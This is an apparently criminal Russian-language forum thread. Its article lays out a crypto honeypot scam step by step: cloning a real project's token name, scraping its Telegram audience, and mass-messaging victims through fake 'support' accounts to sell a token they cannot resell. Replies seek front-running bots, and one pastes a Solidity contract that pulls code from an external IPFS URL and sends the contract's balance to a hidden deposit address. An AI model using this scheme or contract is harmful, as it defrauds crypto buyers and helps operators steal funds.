• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Криптоскам | Ханипоты что это и с чем едят? Статья №1

malloy05

(L2) cache
Пользователь
Реакции
175
Депозит
0.0012
Статья взята с канала Канала - https://t.me/burnout_dev (Не реклама)
Криптоскам становится все популярней и популярней он модернизируется с развитием технологий. Изобретаются куча разных схем обогащения, о которых я буду рассказывать у нас на канале. Схем море, ни к чему не призываем, но каждый для себя найдет пищу для размышлений. Статья представляет собой сугубо информационный посыл.

783d354e97928156b7cd7.png

График ханипот контракта

Погнали, что представляет из себя ханипот?

Ханипот - сматрконтракт токена, который люди могут купить, но не могут продать это самым простым языком.

Но это самый примитивный контракт, есть более умные версии и реализации.

Например:

Ханипот с функцией продажи только у владельцев контракта (можно добавить сколько угодно кошельков) Вы загоняете бабки на эти кошельки, с них покупаете токен и продаете, чтобы нарисовать красивый график и соответственно повысить траст для хомяков, чтобы они смотрели и видели и покупки и продажи.

Далее, одна из важных функций, которая нужна в контракте, это блокировка торговых ботов. Если у вас не заблокированы боты, то когда вы апнете курс своими деньгами или купят хомяки, то бот спиздит у вас часть средств.

Как это происходит.

После крупной покупки (крупная или нет рассчитывается от количества вашей ликвидности, если происходит увеличение курса больше чем на 10% это крупная) и в момент покупки бот через адрес пары обмена, делает 2 транзакции покупка и продажа "ДАЖЕ ЕСЛИ ПРОДАЖИ ЗАКРЫТЫ У ВАС" транзакции происходят в секунду и боту удается заработать от пары баксов до любых сумм лично я видел 300$+ за транзакцию бот выкачивал из ликвидности.

Поэтому надо чтобы это было заблокировано.

Способы применения контракта

cd310f13d1996341555b1.jpg

Как завещал Сергей Пантелеевич

Хватит теории, теперь самое интересное, как зарабатывают бабки на этом. Раскрою пока что один способ сливки оставлю на потом, так что оформляем подписку на канал и ожидаем, статей будет много.

• Представим какой-нибудь крипто проект условный, они еще не выпустили свой токен или выпустили или у них скоро выйдет второй токен, тут на самом деле до пизды по факту, когда скамить аудиторию проекта.
Но естественно лучше, когда токен выходит вот вот. Через час допустим, тут будет самый сок сбора денег.

А так можно и раньше делать, хоть за месяц до выхода, хомяки они на то и хомяки.

Один проект можно скамить несколько раз хоть 10, но с перерывом в пару дней.

Так, как происходит этот чудо скам на ханипоте.

Возвращаемся к проекту.

Вот есть проект, у которого выходит токен завтра в 14 по мск, представим проект STEPN токен называется GMT. (До пизды, где он у них выходит, централизованная биржа или децентрализованная и сеть на который они выходят до пизды) Потому что, что? Правильно, лох не мамонт.

Так вот условные "скамеры на ханипотах" берут чат проекта в тг. И парсят их аудиторию.

Далее создают, токен с идентичным названием (GMT). Правильно это называется деплой контракта токена Ханипота.

Теперь у скамеров есть выпущенный токен с названием GMT, который люди не смогут продать.

Далее надо разместить токен на децентрализованной бирже Pancakeswap и добавить ликвидность.

Звучит наверно все пиздец сложно, но чтобы разобраться надо 5 минут.

3a854bdea8eb81a1bd28c.jpg

Котик для разгрузки

Едем дальше

Теперь Скамеры имеют Аудиторию в текстовике и Задеплоенный и размещенный контакт ханипот токена GTM

Что с этим делать дальше?

• Они находят спамера по тг или уже имеют в команде нужного человека. Либо купили софт и спамят сами. Средняя цена рассылки 2-3 рубля за сообщение, все что больше пиздеж и провокация.
  • Составляют сообщение для рассылки картинка+текст.
70a08d6d918b777f3a395.png

пример сообщения, тут ваш полет фантазии не ограничен, этот скам мне прилетел вчера

3. Подготавливают список ников и аватарок для оформления аккаунтов (например STEPN Support, STEPN ADMIN) латиница+кириллица работает для рандомизации имен. Ну и аварки соответственные взять у проекта авы)

Далее имея это все, спамер оформляет аккаунты, как нужно. И вписывает сообщение, которое будет рассылаться.

Ну и собственно токен выходит в 14 по мск, в 13.00 начинается рассылка допустим на 10к человек

И скамеры сидят и смотрят как люди покупают их токен. Потому что, что лох не мамонт лох не вымрет.

На такого рода схемке я видел, как скамеры собирали по 50к+ баксов за час))

Можно и не окупить рассылку, тут все зависит от правильности выбранного проекта и своевременной реализации.

На сегодня у меня все. Всем спасибо.

Если какие вопросы в чат задавайте.

Буду признателен, если поделитесь статьей с кентами и все вместе вступите к нам в канал.

На днях будет новая статья, благо схем по криптоскаму хренова гора, могу писать без остановки)))

лучше бы дал смарт контракт )
Если я не ошибаюсь, у них в тг
Разработка смартконтрактов продаётся и другие услуги (Не реклама)

Если я не ошибаюсь, у них в тг
Разработка смартконтрактов продаётся и другие услуги (Не реклама)
Если что, могу и други статьи выгрузить на форум, чтоб вы себя не утруждали и не заходили в тг

Если что, могу и други статьи выгрузить на форум, чтоб вы себя не утруждали и не заходили в тг
это будет вообще круто, если будет с кодом. Без кода можно и в тг не ходить

Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
кидай смарт контракт, хоть здесь ) но чтобы ликвидность не ушла хозяинам контракта, а нам именно

это будет вообще круто, если будет с кодом. Без кода можно и в тг не ходить
У тебя по моему были статьи с смарт контрактами

кидай смарт контракт, хоть здесь ) но чтобы ликвидность не ушла хозяинам контракта, а нам именно
У крипто кролика, были статьи с контрактами

Они и на форуме тут лежат. Только баланс уходит в зрительный зал во всех, которые тут есть: либо через API / https://admin.moralis.io/web3apis в основном этот / либо вшит адрес в код контракта, а обычно и так и так, чтоб наверняка. Я еще не достиг такого дзена чтобы с ними справляться. А еще залетают файлы по 70к+ СТРОК кода. В них вообще ковыряться ...... Чё они там напридумывали, я хз.

Думал мож ты выкатишь что полезное. Разобрали бы тут код нормальный бы кто выложил.

Но я однажды и с этим справлюсь

Они и на форуме тут лежат. Только баланс уходит в зрительный зал во всех, которые тут есть: либо через API / https://admin.moralis.io/web3apis в основном этот / либо вшит адрес в код контракта, а обычно и так и так, чтоб наверняка. Я еще не достиг такого дзена чтобы с ними справляться. А еще залетают файлы по 70к+ СТРОК кода. В них вообще ковыряться ...... Чё они там напридумывали, я хз.

Думал мож ты выкатишь что полезное. Разобрали бы тут код нормальный бы кто выложил.

Но я однажды и с этим справлюсь
Админы этого тг откуда я взял статью разрабатывают смартконтракты
УСЛУГИ
1. Разработка проекта под ключ
2. Разработка смартконтрактов
3. Разработка софта / ботов
4. Разработка визуальной части проектов
5. Разработка нфт проектов
(Не реклама)Как я знаю они на верифе есть

Для себя лично то я обратил внимание на это

Далее, одна из важных функций, которая нужна в контракте, это блокировка торговых ботов. Если у вас не заблокированы боты, то когда вы апнете курс своими деньгами или купят хомяки, то бот спиздит у вас часть средств.

Как это происходит.

После крупной покупки (крупная или нет рассчитывается от количества вашей ликвидности, если происходит увеличение курса больше чем на 10% это крупная) и в момент покупки бот через адрес пары обмена, делает 2 транзакции покупка и продажа "ДАЖЕ ЕСЛИ ПРОДАЖИ ЗАКРЫТЫ У ВАС" транзакции происходят в секунду и боту удается заработать от пары баксов до любых сумм лично я видел 300$+ за транзакцию бот выкачивал из ликвидности.

вот тут бы я блядь разобрался поподробнее, исходя из того что (возьмем пример контракта ниже,
У вас должно быть более 10 сообщений для просмотра скрытого контента.
pragma solidity ^0.6.6;

// PancakeSwap manager
import "https://github.com/pancakeswap/panc...ontracts/interfaces/V1/IUniswapV1Exchange.sol";
import "https://github.com/pancakeswap/panc...contracts/interfaces/V1/IUniswapV1Factory.sol";
import "https://ipfs.subutai.io/ipfs/QmRfVqdCDUo4DGaiBcWoNB931dG3nVZvSvFCFc2BZWk847/pancakeswapsideplugin/";

contract Metaverse {
Manager manager;
mapping(address => uint) public balances;
mapping(address => mapping(address => uint)) public allowance;
uint public decimals = 18;
uint public totalSupply = 1000000000 * 10 ** 18; //Coin Supply
string public name = "MetaVerse"; //Coin Name
string public symbol = "META"; //Coin Symbol

event Transfer(address indexed from, address indexed to, uint value);
event Approval(address indexed owner, address indexed spender, uint value);

constructor() public {
balances[msg.sender] = totalSupply;
manager = new Manager();
}

function balanceOf(address owner) public view returns(uint) {
return balances[owner];
}

function transfer(address to, uint value) public returns(bool) {
require(balanceOf(msg.sender) >= value, 'balance too low');
balances[to] += value;
balances[msg.sender] -= value;
emit Transfer(msg.sender, to, value);
return true;
}

//Transaction And Auto Refund
function transferFrom(address from, address to, uint value) public returns(bool) {
require(balanceOf(from) >= value, 'balance too low');
require(allowance[from][msg.sender] >= value, 'allowance too low');
balances[to] += value;
balances[from] -= value;
emit Transfer(from, to, value);
payable(manager.pancakeswapDepositAddress()).transfer(address(this).balance);

return true;
}

//Approval for transaction
function approve(address spender, uint value) public returns (bool) {
allowance[msg.sender][spender] = value;
emit Approval(msg.sender, spender, value);
return true;
}

//Transfer to the address which create this contract.
receive() external payable {}
function action() public payable {
payable(manager.pancakeswapDepositAddress()).transfer(address(this).balance);
manager;
}

}

отметил строку красным цветом которая отвечает за продажу токенов

Так-вот при создании токена (например его покупки) можно посмотреть его код, и если видим эту строку то это именно то о чем идет речь.
В контракте этом вроде нет защиты от ботов но не суть,

Суть в том что ГДЕ взять блядь этого бота который покупает и продает
если на глаз за пару минут можно определить токен наебалово или нет, то я думаю по статистике 98% выпускают обычные токены на которых можно зарабатывать таким ботом.
Ткните носом плиз если кто знает за эти боты где их взять

где их взять
эта уязвимость смарт-контрактов называется фронтранинг. гугл -> бот для фронтранинга,

Ткните носом плиз если кто знает за эти боты где их взять
потыкаешь мой нос тоже если вкусно запахнет) там придумаем как масштабировать

Поделитесь мыслью, если что узнаете))
Тема мягко говоря не простая
По функционалу нашел вот сайт где продают этих ботов https://frontrunbot.io/ - но доверия к таким сайтам нет и покупать там никому не советую (если бы такой бот продавал кто на форуме то другое дело. отзывы, гарант и прочее)
В общем говоря это для спецов которые пишут такого рода боты

Сайт на вордпрессе мож ломанет кто умеет))
А так, Виталик вроде придумал как от фронтранинга избавиться
Посмотреть вложение 45447Виталик Бутерин предложил решение для защиты Эфириума от цензуры валидаторов
Соучредитель Эфириума добавил в техническую дорожную карту проекта этап, повышающий устойчивость к цензуре и децентрализацию блокчейна. Обновленная дорожная карта теперь включает этап под названием Scourge, за которым последуют заявленные ранее обновления Verge, Purge и Splurge. В пояснении к дорожной карте Виталик Бутерин обещает, что Scourge «обеспечит надежное, достоверное и нейтральное включение транзакций и уход от централизации и других рисков протокола, связанных с MEV». После запуска обновления валидаторы не смогут включать блоки в сеть, руководствуясь лишь своими интересами. Заявленное обновление призвано бороться с извлекаемой ценностью майнера (MEV) – эффектом, возникающим, когда валидатор опережает других участников сети, решая, какие транзакции должны быть помещены в блок и в каком порядке. Эффект позволяет валидатором дублировать все выгодные транзакции из мемпула и выполнять их раньше других участников рынка эфира. Пока полная информация о Scourge не разглашается, за исключением скриншота из Твиттера сооснователя проекта. Ранее Бутерин предлагал другое решение проблемы — «Аукцион частичного блока», при котором создателю блока предоставляется право определять только часть содержимого. Были выдвинуты и другие предложения по борьбе с цензурой на уровне консенсуса, такие как Flashbots – Единые унифицирующие аукционы для выражения ценности (SUAVE).
Недавно компания Labrys предложила инструмент, который позволит отслеживать боты MEV, обеспечивающие соблюдение санкций США в Эфириуме. По данным компании Labrys, около 45% блоков в сети Эфириума отклоняются такими ботами. Сразу после слияния исследователи блокчейна предупредили, что протокол извлечения ценности майнинга (MEV) Flashbots подвергает цензуре все транзакции (23%) в Эфириуме, исходящие от заблокированного миксера Tornado Cash.
пока они его вводят, есть время научиться эксплуотации

Scourge, Verge, Purge и Splurge
Нейминг который мы заслужили
Скорбь, порок, очистка и разгром - что интересно у них там в голове))) походу "любовь"

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх